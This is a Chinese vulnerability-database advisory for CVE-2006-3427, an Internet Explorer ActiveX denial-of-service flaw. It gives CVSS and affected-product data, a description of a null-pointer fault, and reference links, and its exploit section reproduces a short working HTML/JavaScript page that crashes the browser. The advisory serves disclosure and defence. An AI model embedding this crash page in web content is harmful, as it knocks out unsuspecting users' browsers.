Microsoft IE StructuredGraphicsControl远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110574 漏洞类型 其他
发布时间 2006-07-06 更新时间 2007-06-26
CVE编号 CVE-2006-3427 CNNVD-ID CNNVD-200607-089
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/28169
https://www.securityfocus.com/bid/18855
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-089
|漏洞详情
MicrosoftIE是微软发布的非常流行的WEB浏览器。MicrosoftIE在处理ActiveX对象时存在漏洞,远程攻击者可能利用此漏洞导致用户的IE崩溃。IE在调用URLOpenBlockingStream()处理ActiveX控件时,ppStream参数会触发空指针应用,如果用户受骗访问了恶意的WEB页面的话就会导致拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/18855/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability because it fails to handle ActiveX controls properly.

This issue is triggered when an attacker convinces a victim user to activate a malicious ActiveX control.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

<html><body><script>

// MoBB Demonstration
function Demo() {
        var a = new ActiveXObject('DirectAnimation.StructuredGraphicsControl');
        a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>


</body></html>
|受影响的产品
Microsoft Internet Explorer 5.0.1 SP4 - Microsoft Windows 2000 Advanced Server SP4 - Microsoft Windows 2000 Datacenter Server SP4 -
|参考资料

来源:BID
名称:18855
链接:http://www.securityfocus.com/bid/18855
来源:OSVDB
名称:26839
链接:http://www.osvdb.org/26839
来源:VUPEN
名称:ADV-2006-2687
链接:http://www.frsirt.com/english/advisories/2006/2687
来源:MISC
链接:http://browserfun.blogspot.com/2006/07/mobb-6-structuredgraphicscontrol.html
来源:XF
名称:ie-structuredgraphicscontrol-sourceurl-dos(27565)
链接:http://xforce.iss.net/xforce/xfdb/27565